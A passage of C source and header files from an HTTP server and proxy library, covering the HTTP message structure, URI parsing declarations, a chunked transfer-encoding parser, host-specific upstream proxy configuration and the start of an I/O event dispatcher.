void * res_cache_info;
/* 0-no body 1-Content-Length body 2-Transfer-Encoding body 3-unknown body */
uint8 res_body_flag;
uint8 res_conn_keepalive;
/* response headers parsed from the raw octets are stored in HeaderUnits,
   which are organized by the following hashtab and list. */
hashtab_t * res_header_table;
arr_t * res_header_list;
/* the following frame buffers store header or body data from the origin server
   or a higher-layer module. the header/body is accessed by reference into these frame buffers.
 * res_stream stores the encoded headers to be delivered to the client. */
frame_p res_header_stream;
frame_p res_body_stream;
frame_p res_stream;
/* response bodies of various formats are handled and stored via the chunk facilities. */
void * res_chunk;
chunk_t * res_body_chunk;
int64 res_stream_sent;
int64 res_stream_recv;
/* by adopting zero-copy for higher performance, the frame buffers of the HTTPCon, which store
   octets read from the socket, are moved to the following list for further parsing or handling
   when receiving octets from the origin server connection and forwarding them to the client.
   this significantly reduces the overhead of memory copying. */
arr_t * res_rcvs_list;
/* system management instance */
void * pcore;
void * httpmgmt;
/* notify the upper-layer application when the TCP connection is torn down */
TearDownNotify * tear_down_notify;
void * tear_down_para;
RecvAllNotify * resnotify;
uint8 resnotify_called;
void * resnotify_para;
void * resnotify_cbval;
char * res_store_file;
int64 res_store_offset;
ProcessNotify * res_recv_procnotify;
void * res_recv_procnotify_para;
uint64 res_recv_procnotify_cbval;
ProcessNotify * req_send_procnotify;
void * req_send_procnotify_para;
uint64 req_send_procnotify_cbval;
int (*SetTearDownNotify)(void * vmsg, void * func, void * para);
int (*SetResponseNotify)(void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * notifypara, uint64 notifycbval);
int (*SetResStoreFile) (void * vmsg, char * storefile, int64 offset);
int (*SetResRecvAllNotify) (void * vmsg, void * func, void * para, void * cbval);
int (*SetResRecvProcNotify) (void * vmsg, void * procnotify, void * para, uint64 cbval);
int (*SetReqSendProcNotify) (void * vmsg, void * procnotify, void * para, uint64 cbval);
char * (*GetMIME) (void * vmsg, char * extname, uint32 * mimeid);
void * (*GetMIMEMgmt) (void * vmsg);
void * (*GetEPump) (void * vmsg);
void * (*GetHTTPMgmt) (void * vmsg);
void * (*GetCBObj) (void * vmsg);
void * (*GetMgmtObj) (void * vmsg);
void * (*GetMsgObj) (void * vmsg);
void * (*GetIODev) (void * vmsg);
frame_p (*GetFrame) (void * vmsg);
int (*RecycleFrame) (void * vmsg, frame_p frame);
void * (*Fetch) (void * vmsg);
int (*Init) (void * vmsg);
int (*InitReq) (void * vmsg);
int (*InitRes) (void * vmsg);
int (*Recycle) (void * vmsg);
int (*Close) (void * vmsg);
int (*CacheType) (void * vmsg, int respornot);
char * (*CacheFile) (void * vmsg, int respornot);
char * (*GetSrcIP) (void * vmsg);
int (*GetSrcPort) (void * vmsg);
ulong (*GetMsgID) (void * vmsg);
int (*GetMethodInd) (void * vmsg);
char * (*GetMethod) (void * vmsg);
int (*SetMethod) (void * vmsg, char * meth, int methlen);
char * (*GetURL) (void * vmsg);
int (*SetURL) (void * vmsg, char * url, int len, int decode);
char * (*GetDocURL) (void * vmsg);
int (*SetDocURL) (void * vmsg, char * url, int len, int decode, int instbrk);
int (*GetBaseURL) (void * vmsg, char ** p, int * plen);
char * (*GetAbsURL) (void * vmsg);
char * (*GetRelativeURL) (void * vmsg);
int (*GetSchemeP) (void * vmsg, char ** pscheme, int * plen);
int (*GetScheme) (void * vmsg, char * pscheme, int len);
int (*GetHostP) (void * vmsg, char ** phost, int * plen);
int (*GetHost) (void * vmsg, char * phost, int len);
int (*GetPort) (void * vmsg);
char * (*GetRootPath) (void * vmsg);
int (*GetPathP) (void * vmsg, char ** ppath, int * plen);
int (*GetPath) (void * vmsg, char * path, int len);
int (*GetPathOnly) (void * vmsg, char * path, int len);
int (*GetFileOnly) (void * vmsg, char * file, int len);
int (*GetFileExt) (void * vmsg, char * fileext, int len);
int (*GetRealPath) (void * vmsg, char * path, int len);
int (*GetRealFile) (void * vmsg, char * path, int len);
int (*GetLocFile) (void * vmsg, char * p, int len, char * f, int flen, char * d, int dlen);
int (*GetQueryP) (void * vmsg, char ** pquery, int * plen);
int (*GetQuery) (void * vmsg, char * query, int len);
int (*GetQueryValueP) (void * vmsg, char * key, char ** pval, int * vallen);
int (*GetQueryValue) (void * vmsg, char * key, char * val, int vallen);
int (*GetQueryUint) (void * vmsg, char * key, uint32 * val);
int (*GetQueryInt) (void * vmsg, char * key, int * val);
int (*GetQueryUlong) (void * vmsg, char * key, ulong * val);
int (*GetQueryLong) (void * vmsg, char * key, long * val);
int (*GetQueryInt64) (void * vmsg, char * key, int64 * val);
int (*GetQueryUint64) (void * vmsg, char * key, uint64 * val);
int (*GetQueryKeyExist)(void * vmsg, char * key);
int (*GetReqContentP) (void * vmsg, void ** pform, int * plen);
int (*GetReqContent) (void * vmsg, void * form, int len);
int (*GetReqFormJsonValueP) (void * vmsg, char * key, char ** ppval, int * vallen);
int (*GetReqFormJsonValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormJsonKeyExist)(void * vmsg, char * key);
int (*GetReqFormDecodeValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormValueP) (void * vmsg, char * key, char ** ppval, int * vallen);
int (*GetReqFormValue) (void * vmsg, char * key, char * pval, int vallen);
int (*GetReqFormUint) (void * vmsg, char * key, uint32 * val);
int (*GetReqFormInt) (void * vmsg, char * key, int * val);
int (*GetReqFormUlong) (void * vmsg, char * key, ulong * val);
int (*GetReqFormLong) (void * vmsg, char * key, long * val);
int (*GetReqFormUint64) (void * vmsg, char * key, uint64 * val);
int (*GetReqFormKeyExist)(void * vmsg, char * key);
int (*GetReqHdrNum) (void * vmsg);
int (*GetReqHdrIndP) (void * vmsg, int i, char ** pn, int * nlen, char ** pv, int * vlen);
int (*GetReqHdrInd) (void * vmsg, int i, char * pn, int nlen, char * pv, int vlen);
int (*GetReqHdrP) (void * vmsg, char * n, int nlen, char ** pval, int * vlen);
int (*GetReqHdr) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*GetReqHdrInt) (void * vmsg, char * name, int namelen);
long (*GetReqHdrLong) (void * vmsg, char * name, int namelen);
ulong (*GetReqHdrUlong) (void * vmsg, char * name, int namelen);
int64 (*GetReqHdrInt64) (void * vmsg, char * name, int namelen);
uint64 (*GetReqHdrUint64) (void * vmsg, char * name, int namelen);
int (*GetReqContentTypeP)(void * vmsg, char ** ptype, int * typelen);
int (*GetReqContentType) (void * vmsg, char * type, int typelen);
int (*GetReqContentLength)(void * vmsg);
int (*GetReqEtag) (void * vmsg, char * etag, int etaglen);
int (*GetCookieP) (void * vmsg, char * name, int nlen, char ** pv, int * vlen);
int (*GetCookie) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*ParseReqMultipartForm) (void * vmsg, arr_t * formdatalist);
int (*DisplayDirectory) (void * vmsg);
int (*AddReqHdr) (void * vmsg, char * na, int nlen, char * val, int vlen);
int (*AddReqHdrInt) (void * vmsg, char * name, int namelen, int value);
int (*AddReqHdrUint32)(void * vmsg, char * name, int namelen, uint32 value);
int (*AddReqHdrLong) (void * vmsg, char * name, int namelen, long value);
int (*AddReqHdrUlong) (void * vmsg, char * name, int namelen, ulong value);
int (*AddReqHdrInt64) (void * vmsg, char * name, int namelen, int64 value);
int (*AddReqHdrUint64)(void * vmsg, char * name, int namelen, uint64 value);
int (*AddReqHdrDate) (void * vmsg, char * name, int namelen, time_t dtime);
int (*DelReqHdr) (void * vmsg, char * name, int namelen);
int (*SetReqContentType) (void * vmsg, char * type, int typelen);
int (*SetReqContentLength) (void * vmsg, int64 len);
int (*SetReqContent) (void * vmsg, void * body, int bodylen);
int (*SetReqFileContent) (void * vmsg, char * filename);
int (*AddReqContent) (void * vmsg, void * body, int64 bodylen);
int (*AddReqContentPtr) (void * vmsg, void * body, int64 bodylen);
int (*AddReqFile) (void * vmsg, char * filename, int64 startpos, int64 len);
int (*AddReqAppCBContent) (void * vmsg, void * prewrite, void * prewobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endwrite, void * endwobj);
int (*GetStatus) (void * vmsg, char * reason, int * reasonlen);
int (*GetResHdrNum) (void * vmsg);
int (*GetResHdrIndP) (void * vmsg, int i, char **pn, int * nlen, char **pv, int * vlen);
int (*GetResHdrInd) (void * vmsg, int i, char *pn, int nlen, char *pv, int vlen);
int (*GetResHdrP) (void * vmsg, char * n, int nlen, char ** pval, int * vlen);
int (*GetResHdr) (void * vmsg, char * name, int nlen, char * val, int vlen);
int (*GetResHdrInt) (void * vmsg, char * name, int namelen);
long (*GetResHdrLong) (void * vmsg, char * name, int namelen);
ulong (*GetResHdrUlong) (void * vmsg, char * name, int namelen);
int64 (*GetResHdrInt64) (void * vmsg, char * name, int namelen);
uint64 (*GetResHdrUint64) (void * vmsg, char * name, int namelen);
int (*GetResContentTypeP)(void * vmsg, char ** ptype, int * typelen);
int (*GetResContentType) (void * vmsg, char * type, int typelen);
int (*GetResContentTypeID)(void * vmsg, uint32 * mimeid, char ** pext);
int64 (*GetResContentLength)(void * vmsg);
int (*GetResContent) (void * vmsg, void * body, int bodylen);
int (*GetResContentP) (void * vmsg, int64 pos, void ** pbody, int64 * bodylen);
int (*SetStatus) (void * vmsg, int code, char * reason);
int (*AddResHdr) (void * vmsg, char * na, int nlen, char * val, int vlen);
int (*AddResHdrInt) (void * vmsg, char * name, int namelen, int value);
int (*AddResHdrUint32)(void * vmsg, char * name, int namelen, uint32 value);
int (*AddResHdrLong) (void * vmsg, char * name, int namelen, long value);
int (*AddResHdrUlong) (void * vmsg, char * name, int namelen, ulong value);
int (*AddResHdrInt64)(void * vmsg, char * name, int namelen, int64 value);
int (*AddResHdrUint64)(void * vmsg, char * name, int namelen, uint64 value);
int (*AddResHdrDate) (void * vmsg, char * name, int namelen, time_t dtime);
int (*DelResHdr) (void * vmsg, char * name, int namelen);
int (*SetResEtag) (void * vmsg, char * etag, int etaglen);
int (*SetCookie) (void * vmsg, char * name, char * value,
time_t expire, char * path, char * domain, uint8 secure);
int (*Check304Resp) (void * vmsg, uint64 mediasize, time_t mtime, uint32 inode);
int (*SetResContentType) (void * vmsg, char * type, int typelen);
int (*SetResContentTypeID) (void * vmsg, uint32 mimeid);
int (*SetResContentLength) (void * vmsg, int64 len);
int (*AddResContent) (void * vmsg, void * body, int64 bodylen);
int (*AddResStripContent) (void * vmsg, void * body, int64 bodylen,
char * escch, int chlen);
int (*AddResContentPtr) (void * vmsg, void * body, int64 bodylen);
int (*AddResFile) (void * vmsg, char * filename, int64 startpos, int64 len);
int (*AddResAppCBContent) (void * vmsg, void * prewrite, void * prewobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endwrite, void * endwobj);
int (*AddResTpl) (void * vmsg, void * pbyte, int bytelen, void * tplvar);
int (*AddResTplFile) (void * vmsg, char * tplfile, void * tplvar);
int (*AsynReply) (void * vmsg, int bodyend, int probewrite);
int (*Reply) (void * vmsg);
int (*ReplyFeeding) (void * vmsg);
int (*ReplyFeedingEnd) (void * vmsg);
int (*RedirectReply) (void * vmsg, int status, char * redurl);
uint8 extdata[1];
} HTTPMsg;
int http_msg_cmp_http_msg(void * a, void * b);
int http_msg_cmp_msgid (void * a, void * pat);
ulong http_msg_hash_msgid (void * key);
/* http message instance release/initialize/recycle routines */
int http_msg_free (void * vmsg);
int http_msg_init (void * vmsg);
int http_msg_recycle (void * vmsg);
int http_msg_close (void * vmsg);
int http_msg_init_method (void * vmsg);
int http_msg_init_req (void * vmsg);
int http_msg_init_res (void * vmsg);
char * http_msg_srcip (void * vmsg);
int http_msg_srcport (void * vmsg);
ulong http_msg_id (void * vmsg);
void * http_msg_cbobj (void * vmsg);
void * http_msg_obj (void * vmsg);
void * http_msg_mgmtobj (void * vmsg);
void * http_msg_newmsg (void * vmsg);
char * http_msg_get_mime (void * vmsg, char * extname, uint32 * mimeid);
void * http_msg_get_mimemgmt (void * vmsg);
int http_msg_set_teardown_notify (void * vmsg, void * func, void * para);
int http_msg_set_response_notify (void * vmsg, void * func, void * para, void * cbval,
char * storefile, int64 offset,
void * procnotify, void * notifypara, uint64 notifycbval);
int http_msg_set_res_store_file (void * vmsg, char * storefile, int64 offset);
int http_msg_set_res_recvall_notify (void * vmsg, void * func, void * para, void * cbval);
int http_msg_set_res_recvproc_notify (void * vmsg, void * procnotify, void * para, uint64 cbval);
int http_msg_set_req_sendproc_notify (void * vmsg, void * procnotify, void * para, uint64 cbval);
/* 1 - temporary cache file
2 - application-given file for storing response body
3 - proxy cache file with partial content
4 - proxy cache file with all content */
int http_msg_cache_type (void * vmsg, int respornot);
char * http_msg_cache_file (void * vmsg, int respornot);
int http_msg_mgmt_add (void * vmgmt, void * vmsg);
void * http_msg_mgmt_get (void * vmgmt, ulong msgid);
void * http_msg_mgmt_del (void * vmgmt, ulong msgid);
int http_msg_var_set (void * vmsg, char * name, char * value, int valuelen);
int http_msg_var_get (void * vmsg, char * name, char * value, int valuelen);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_uri.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_URI_H_
#define _HTTP_URI_H_
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_uri_s {
frame_t * uri;
uint8 type; //0-relative 1-absolute 2-connect uri
uint8 ssl_link; //0-regular 1-ssl
char * reluri;
int relurilen;
char * baseuri;
int baseurilen;
char * rooturi;
int rooturilen;
char * scheme;
int schemelen;
char * host;
int hostlen;
int port;
char * path;
int pathlen;
char * query;
int querylen;
char * dir;
int dirlen;
char * file;
int filelen;
char * file_base;
int file_baselen;
char * file_ext;
int file_extlen;
} HTTPUri, http_uri_t;
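/* Illustrative decomposition (an assumption based on the field names, not verified against
   http_uri_parse): for "http://www.example.com:8080/docs/index.html?id=3" one would expect
   scheme "http", host "www.example.com", port 8080, path "/docs/index.html", query "id=3",
   dir "/docs/", file "index.html", file_base "index" and file_ext holding the extension
   (whether the leading dot is included is not clear from this header alone). */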
void * http_uri_alloc();
void http_uri_free (void * vuri);
void http_uri_init (void * vuri);
int http_uri_set (void * vuri, char * p, int len, int decode);
int http_uri_parse (void * vuri);
int http_uri_path_parse (void * vuri);
char * http_uri_string (void * vuri);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_chunk.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_chunk.h"
void * http_buf_alloc ()
{
HTTPBuf * pbuf = NULL;
pbuf = kzalloc(sizeof(*pbuf));
return pbuf;
}
void http_buf_free (void * vbuf)
{
HTTPBuf * pbuf = (HTTPBuf *)vbuf;
if (!pbuf) return;
if (pbuf->alloc) {
kfree(pbuf->pbgn);
}
kfree(pbuf);
}
void * http_buf_dup (void * vbuf)
{
HTTPBuf * pbuf = (HTTPBuf *)vbuf;
HTTPBuf * dup = NULL;
dup = http_buf_alloc();
if (!pbuf) return dup;
dup->pbgn = pbuf->pbgn;
dup->len = pbuf->len;
dup->body_bgn = pbuf->body_bgn;
dup->body_len = pbuf->body_len;
dup->alloc = 0;
return dup;
}
void * http_chunk_item_alloc ()
{
HTTPChunkItem * item = NULL;
item = kzalloc(sizeof(*item));
if (!item) return NULL;
return item;
}
void http_chunk_item_free (void * vitem)
{
HTTPChunkItem * item = (HTTPChunkItem *)vitem;
if (!item) return;
kfree(item);
}
void * http_chunk_item_dup (void * vitem)
{
HTTPChunkItem * item = (HTTPChunkItem *)vitem;
HTTPChunkItem * dup = NULL;
dup = http_chunk_item_alloc();
if (!item) return dup;
dup->chksize = item->chksize;
dup->chklen = item->chklen;
dup->recvsize = item->recvsize;
dup->recvlen = item->recvlen;
dup->gotall = item->gotall;
return dup;
}
void * http_chunk_alloc ()
{
HTTPChunk * chk = NULL;
chk = kzalloc(sizeof(*chk));
if (!chk) return NULL;
chk->item_list = arr_new(4);
chk->chunk = chunk_new(16384);
return chk;
}
int http_chunk_zero (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
int i, num;
if (!chk) return -1;
chk->gotall = 0;
chk->gotallbody = 0;
chk->chksize = 0;
chk->chklen = 0;
chk->recvsize = 0;
chk->recvlen = 0;
chk->chknum = 0;
if (chk->curitem) {
http_chunk_item_free(chk->curitem);
chk->curitem = NULL;
}
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
http_chunk_item_free(arr_value(chk->item_list, i));
}
arr_zero(chk->item_list);
chk->enthdrsize = 0;
if (chk->enthdr) {
http_buf_free(chk->enthdr);
chk->enthdr = NULL;
}
chunk_zero(chk->chunk);
return 0;
}
void http_chunk_free (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunkItem * item = NULL;
int i, num;
if (!chk) return;
if (chk->curitem)
http_chunk_item_free(chk->curitem);
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
item = arr_value(chk->item_list, i);
http_chunk_item_free(item);
}
arr_free(chk->item_list);
http_buf_free(chk->enthdr);
chunk_free(chk->chunk);
kfree(chk);
}
chunk_t * http_chunk_obj (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
if (!chk) return NULL;
return chk->chunk;
}
int http_chunk_gotall (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
if (!chk) return 0;
return chk->gotall;
}
void * http_chunk_dup (void * vchk)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunk * dup = NULL;
HTTPChunkItem * item = NULL;
int i, num;
dup = http_chunk_alloc();
if (!chk) return dup;
dup->gotall = chk->gotall;
dup->gotallbody = chk->gotallbody;
dup->chksize = chk->chksize;
dup->chklen = chk->chklen;
dup->recvsize = chk->recvsize;
dup->recvlen = chk->recvlen;
dup->chknum = chk->chknum;
if (chk->curitem) {
dup->curitem = http_chunk_item_dup(chk->curitem);
} else {
dup->curitem = NULL;
}
num = arr_num(chk->item_list);
for (i = 0; i < num; i++) {
item = http_chunk_item_dup(arr_value(chk->item_list, i));
arr_push(dup->item_list, item);
}
dup->enthdrsize = chk->enthdrsize;
dup->enthdr = http_buf_dup(chk->enthdr);
return dup;
}
/* return value:
< 0, error
= 0, waiting for more data
> 0, parsed successfully
*/
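/* Illustrative walk-through (added for clarity; the byte string is a made-up example, not
   taken from a real capture): feeding the 24-byte sequence
       "4\r\nWiki\r\n" "5\r\npedia\r\n" "0\r\n" "\r\n"
   to http_chunk_add_bufptr() in a single call parses two data chunks and the terminating
   chunk, appends the 9 decoded body bytes "Wikipedia" to chk->chunk, sets chk->gotall,
   reports *rmlen = 24 and returns 1. If the buffer were cut short, the call would instead
   return 0 and report via *rmlen how many bytes it has consumed so far. */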
int http_chunk_add_bufptr (void * vchk, void * vbgn, int len, int * rmlen)
{
HTTPChunk * chk = (HTTPChunk *)vchk;
HTTPChunkItem * item = NULL;
HTTPBuf * pbuf = NULL;
int restnum = 0;
int64 chksizelen = 0;
int64 chkbodylen = 0;
int64 restlen = 0;
uint8 * pbgn = (uint8 *)vbgn;
uint8 * poct = NULL;
uint8 * pcrlf = NULL;
uint8 * pend = NULL;
if (!chk) return -1;
pend = pbgn + len;
while (!chk->gotallbody && pbgn < pend) {
if ( (item = chk->curitem) == NULL ) {
chkbodylen = strtoll((char *)pbgn, (char **)&poct, 16);
pcrlf = sun_find_bytes(pbgn, pend - pbgn, "\r\n", 2, NULL);
if (!pcrlf) {
/* not enough bytes to form the chunk-size line; wait for more data */
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
return 0;
}
if (poct != pcrlf) {
/* there are extra bytes (e.g. chunk extensions) between the chunk-size and the \r\n; they are tolerated here */
//return -100;
}
poct = pcrlf + 2;
chksizelen = poct - pbgn;
item = chk->curitem = http_chunk_item_alloc();
if (!item) return -10;
if (chkbodylen > 0)
item->chksize = chksizelen + chkbodylen + 2;
else
item->chksize = chksizelen + chkbodylen;
item->chklen = chkbodylen;
item->recvsize = chksizelen;
item->recvlen = 0;
chk->chksize += item->chksize;
chk->chklen += item->chklen;
chk->recvsize += chksizelen;
chk->chknum++;
if (chkbodylen == 0) {
/* terminating chunk: "0\r\n", optionally followed by trailer headers, then a final "\r\n" */
arr_push(chk->item_list, item);
chk->curitem = NULL;
chk->gotallbody = 1;
chunk_set_end(chk->chunk);
pbgn = poct;
break;
}
} else {
poct = pbgn;
}
restlen = item->chksize - item->recvsize;
restnum = pend - poct;
if (restnum >= restlen) {
item->gotall = 1;
item->recvsize += restlen;
item->recvlen += restlen - 2; //the trailing \r\n is not counted as body data
chk->recvsize += restlen;
chk->recvlen += restlen - 2;
chunk_add_bufptr(chk->chunk, poct, restlen - 2, NULL);
arr_push(chk->item_list, item);
chk->curitem = NULL;
pbgn = poct + restlen;
} else {
item->gotall = 0;
item->recvsize += restnum;
chk->recvsize += restnum;
item->recvlen += min(restnum, restlen);
chk->recvlen += min(restnum, restlen);
chunk_add_bufptr(chk->chunk, poct, min(restnum, restlen), NULL);
if (rmlen) *rmlen = len;
return 0; //waiting for more data
}
} //end while
if (chk->gotallbody && !chk->gotall) {
if (pend - pbgn >= 2 && pbgn[0] == '\r' && pbgn[1] == '\n') {
poct = pbgn + 2;
} else {
pcrlf = sun_find_bytes(pbgn, pend - pbgn, "\r\n\r\n", 4, NULL);
if (!pcrlf) {
/* not enough bytes to complete the trailer section; wait for more data */
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
return 0;
}
poct = pcrlf + 4;
}
chk->chksize += poct - pbgn;
chk->recvsize += poct - pbgn;
chk->enthdrsize = poct - pbgn;
chk->enthdr = pbuf = http_buf_alloc();
pbuf->pbgn = pbgn;
pbuf->len = poct - pbgn;
pbuf->body_bgn = pbgn;
pbuf->body_len = poct - pbgn;
if (rmlen) *rmlen = poct - (uint8 *)vbgn;
chk->gotall = 1;
chunk_set_end(chk->chunk);
return 1;
}
if (rmlen) *rmlen = pbgn - (uint8 *)vbgn;
/* should not normally be reached */
return 1;
}
<|start_filename|>include/http_cc.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CONGESTION_H_
#define _HTTP_CONGESTION_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_cli_recv_cc (void * vcon);
int http_cli_send_cc (void * vcon);
int http_srv_recv_cc (void * vcon);
int http_srv_send_cc (void * vcon);
int http_fcgi_recv_cc (void * vcon);
int http_fcgi_send_cc (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_sndpxy.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_sndpxy.h"
#include "http_mgmt.h"
#include "http_msg.h"
void * send_proxy_alloc ()
{
SendProxy * sndpxy = NULL;
sndpxy = kzalloc(sizeof(*sndpxy));
return sndpxy;
}
void send_proxy_free (void * vsndpxy)
{
SendProxy * sndpxy = (SendProxy *)vsndpxy;
if (!sndpxy) return;
if (sndpxy->host)
kfree(sndpxy->host);
if (sndpxy->preg) {
#ifdef UNIX
regfree(sndpxy->preg);
kfree(sndpxy->preg);
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre_free(sndpxy->preg);
#endif
}
if (sndpxy->proxy)
kfree(sndpxy->proxy);
kfree(sndpxy);
}
/* next-hop proxy host and port used when sending an http request.
 * example configuration:
 *   proxy setting = {
 *       # the left side is a regular expression matched against the request host:port,
 *       # the right side is the proxy host and optional port
 *       ^(.+)sina.com.cn$ = 172.16.17.32:8080;
 *   };
 */
int http_send_proxy_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
void * jsndpxy = NULL;
int ret = 0;
int i, num = 0;
SendProxy * sndpxy = NULL;
char * key;
int keylen = 0;
char * data;
int datalen = 0;
char * plist[4];
int plen[4];
if (!mgmt) return -1;
if (mgmt->sndpxy_list == NULL)
mgmt->sndpxy_list = arr_new(4);
ret = json_mget_obj(mgmt->cnfjson, "http.send request.proxy setting", -1, &jsndpxy);
if (ret <= 0) return 0;
num = json_num(jsndpxy);
for (i = 0; i < num; i++) {
ret = json_iter(jsndpxy, i, (void **)&key, &keylen, (void **)&data, &datalen, NULL);
if (ret <= 0) continue;
if (!key || keylen <= 0) continue;
if (!data || datalen <= 0) continue;
sndpxy = send_proxy_alloc();
if (!sndpxy) continue;
sndpxy->host = str_dup(key, keylen);
#ifdef UNIX
sndpxy->preg = kzalloc(sizeof(regex_t));
regcomp(sndpxy->preg, sndpxy->host, REG_EXTENDED | REG_ICASE);
#endif
#if defined(_WIN32) || defined(_WIN64)
sndpxy->preg = pcre_compile(sndpxy->host, PCRE_CASELESS, &key, &keylen, NULL);
#endif
ret = string_tokenize(data, datalen, ":", 1, (void **)plist, plen, 4);
if (ret <= 0) {
send_proxy_free(sndpxy);
continue;
}
sndpxy->proxy = str_dup(plist[0], plen[0]);
if (ret > 1) {
sndpxy->port = str_to_int(plist[1], plen[1], 10, NULL);
}
arr_push(mgmt->sndpxy_list, sndpxy);
}
tolog(1, "eJet - %d Proxy Setting loaded for host-specific http request.\n", num);
return i;
}
void http_send_proxy_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return;
if (mgmt->sndpxy_list) {
arr_pop_free(mgmt->sndpxy_list, send_proxy_free);
mgmt->sndpxy_list = NULL;
}
tolog(1, "eJet - Proxy Setting for host-specific http request cleaned.\n");
}
int http_send_proxy_check (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
SendProxy * sndpxy = NULL;
char buf[256];
int i, num;
int ret = 0;
#ifdef UNIX
regmatch_t pmat[16];
#endif
#if defined(_WIN32) || defined(_WIN64)
int ovec[36];
#endif
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
str_secpy(buf, sizeof(buf)-1, msg->req_host, msg->req_hostlen);
if (!msg->ssl_link && msg->req_port != 80) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
} else if (msg->ssl_link && msg->req_port != 443) {
sprintf(buf + strlen(buf), ":%d", msg->req_port);
}
num = arr_num(mgmt->sndpxy_list);
for (i = 0; i < num; i++) {
sndpxy = arr_value(mgmt->sndpxy_list, i);
if (!sndpxy) continue;
#ifdef UNIX
ret = regexec(sndpxy->preg, buf, 16, pmat, 0);
if (ret == 0) {
#endif
#if defined(_WIN32) || defined(_WIN64)
ret = pcre_exec(sndpxy->preg, NULL, buf, strlen(buf), 0, 0, ovec, 36);
if (ret > 0) {
#endif
msg->proxy = sndpxy->proxy;
if (sndpxy->port == 0) {
msg->proxyport = msg->ssl_link ? 443 : 80;
} else {
msg->proxyport = sndpxy->port;
}
msg->dstport = msg->proxyport;
return 1;
}
}
return 0;
}
<|start_filename|>src/http_pump.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_header.h"
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_pump.h"
#include "http_srv.h"
#include "http_con.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_handle.h"
#include "http_ssl.h"
int http_pump (void * vmgmt, void * vobj, int event, int fdtype)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
HTTPCon * pcon = NULL;
HTTPListen * hl = NULL;
ulong conid = 0;
int cmd = 0;
if (!mgmt) return -1;
switch (event) {
case IOE_ACCEPT:
if (fdtype != FDT_LISTEN)
return -1;
hl = (HTTPListen *)http_listen_find(mgmt, iodev_lip(vobj), iodev_lport(vobj));
if (!hl) return -1;
return http_cli_accept(mgmt, vobj);
case IOE_INVALID_DEV:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
tolog(1, "eJet - TCP Connect: invalid connection to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
return http_con_close(pcon);
}
break;
case IOE_READ:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_ACCEPTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_accept(pcon);
else
return http_cli_recv(pcon);
} else if (fdtype == FDT_CONNECTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_connect(pcon);
else
return http_srv_recv(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_WRITE:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
if (fdtype == FDT_ACCEPTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_accept(pcon);
else
return http_cli_send(pcon);
} else if (fdtype == FDT_CONNECTED) {
if (pcon->ssl_link && !pcon->ssl_handshaked)
return http_ssl_connect(pcon);
else
return http_srv_send(pcon);
} else
return -1;
} else {
return -20;
}
break;
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_http_srv_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->life_timer == vobj) {
http_srv_con_lifecheck(pcon);
}
return 0;
} else if (cmd == t_http_cli_con_life) {
conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->life_timer == vobj) {
http_cli_con_lifecheck(pcon);
}
return 0;
} else if (cmd == t_http_srv_con_build) {
